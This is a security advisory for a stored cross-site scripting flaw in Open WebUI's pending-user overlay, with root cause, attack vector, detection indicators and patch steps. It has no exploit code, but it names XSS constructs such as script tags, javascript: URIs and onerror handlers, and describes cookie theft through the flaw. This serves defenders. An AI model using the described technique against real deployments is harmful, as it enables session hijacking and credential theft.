CVE-2026-44568 Overview
CVE-2026-44568 is a stored cross-site scripting (XSS) vulnerability in Open WebUI, a self-hosted artificial intelligence platform that operates entirely offline. The flaw exists in the AccountPending.svelte component, which renders admin-configured "Pending User Overlay Content" using marked.parse() inside an {@html} block with an incorrect DOMPurify application order. An administrator can inject arbitrary JavaScript into the overlay content, which then executes in the browser of any pending user who views the page. The issue is classified under CWE-79 and is fixed in Open WebUI version 0.9.0.
Critical Impact
A privileged administrator can inject persistent JavaScript that executes in the browser context of pending users, enabling session hijacking, credential theft, or further client-side attacks.
Affected Products
- Open WebUI versions prior to 0.9.0
- Self-hosted Open WebUI deployments using the AccountPending.svelte overlay component
- Open WebUI instances where multiple administrators or untrusted admins exist
Discovery Timeline
- 2026-05-15 - CVE-2026-44568 published to NVD
- 2026-05-19 - Last updated in NVD database
Technical Details for CVE-2026-44568
Vulnerability Analysis
The vulnerability resides in the AccountPending.svelte component of Open WebUI. The component is responsible for rendering an overlay shown to users whose accounts await administrator approval. To support formatted text, the overlay passes admin-supplied content through marked.parse(), which converts Markdown into HTML, and then injects the result into the DOM via Svelte's {@html} directive.
The sanitization pipeline applies DOMPurify in the wrong order relative to Markdown parsing. Because sanitization does not effectively cover the final HTML rendered into the DOM, dangerous constructs survive and execute when the browser parses the markup. The result is a persistent (stored) XSS primitive triggered automatically on page load for any pending user.
Root Cause
The root cause is improper neutralization of input during web page generation [CWE-79]. Sanitization must operate on the final HTML output that will be inserted into the DOM. In this component, DOMPurify is invoked at a stage that allows marked.parse() to reintroduce or preserve unsafe HTML, including inline event handlers and script-bearing attributes, before rendering through {@html}.
Attack Vector
Exploitation requires high privileges because only an administrator can configure the Pending User Overlay Content. The attack is network-reachable and requires user interaction in the form of a pending user visiting the overlay page. Once an attacker with admin access stores the payload, every pending user who loads the overlay executes the injected JavaScript in their authenticated browser context. This enables cookie theft, CSRF against the Open WebUI API, redirection to phishing pages, and pivoting through the victim's session. The scope is changed because the script executes in the user's browser sandbox under the Open WebUI origin, affecting resources beyond the attacker's own account.
No public proof-of-concept code is available. Refer to the GitHub Security Advisory GHSA-fq3v-xjjx-95rc for vendor technical details.
Detection Methods for CVE-2026-44568
Indicators of Compromise
- Unexpected <script> tags, javascript: URIs, or inline event handlers (such as onerror, onload) stored in the Open WebUI Pending User Overlay Content configuration
- Outbound HTTP requests from pending user browsers to unfamiliar domains shortly after loading the account-pending page
- Anomalous session token usage or API calls originating from pending user accounts that have not yet been approved
Detection Strategies
- Audit the Open WebUI database and admin configuration for the Pending User Overlay Content field, searching for HTML tags, script content, or encoded payloads
- Review administrator activity logs for changes to overlay or onboarding configuration made by unexpected accounts
- Inspect browser Content Security Policy (CSP) violation reports for blocked inline script executions on the account-pending route
Monitoring Recommendations
- Enable verbose audit logging for all administrative configuration changes in Open WebUI
- Monitor reverse proxy or web server logs for /auth and account-pending route traffic correlated with suspicious outbound activity
- Track the deployed Open WebUI version across all instances and alert on any version below 0.9.0
How to Mitigate CVE-2026-44568
Immediate Actions Required
- Upgrade all Open WebUI deployments to version 0.9.0 or later, which contains the fix
- Review and sanitize the existing Pending User Overlay Content configuration, removing any HTML or scripting constructs
- Audit the list of administrator accounts and rotate credentials for any admin whose access is no longer required
Patch Information
The vulnerability is fixed in Open WebUI 0.9.0. The patch corrects the order of DOMPurify sanitization relative to marked.parse() output in the AccountPending.svelte component so that the final HTML injected through {@html} is sanitized before rendering. See the Open WebUI Security Advisory GHSA-fq3v-xjjx-95rc for vendor guidance.
Workarounds
- Clear the Pending User Overlay Content field until the upgrade can be completed
- Restrict administrative access to trusted personnel only and enforce multi-factor authentication for admin logins
- Deploy a strict Content Security Policy that disallows inline scripts and untrusted external script sources for the Open WebUI origin
# Upgrade Open WebUI to the patched version using Docker
docker pull ghcr.io/open-webui/open-webui:0.9.0
docker stop open-webui
docker rm open-webui
docker run -d --name open-webui \
-p 3000:8080 \
-v open-webui:/app/backend/data \
ghcr.io/open-webui/open-webui:0.9.0
# Verify the running version
docker exec open-webui cat /app/backend/open_webui/env.py | grep VERSION
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
